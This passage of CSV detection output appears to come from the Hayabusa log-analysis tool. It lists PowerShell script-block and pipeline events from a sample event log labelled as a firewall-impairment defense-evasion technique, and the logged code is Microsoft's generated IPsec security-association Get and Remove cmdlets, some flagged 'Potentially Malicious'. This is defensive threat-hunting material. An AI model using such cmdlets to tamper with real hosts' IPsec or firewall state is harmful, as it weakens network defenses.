-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 
'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { 
Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 
'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" 
ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.477 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.477 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.480 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or 
Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.499 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.499 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] 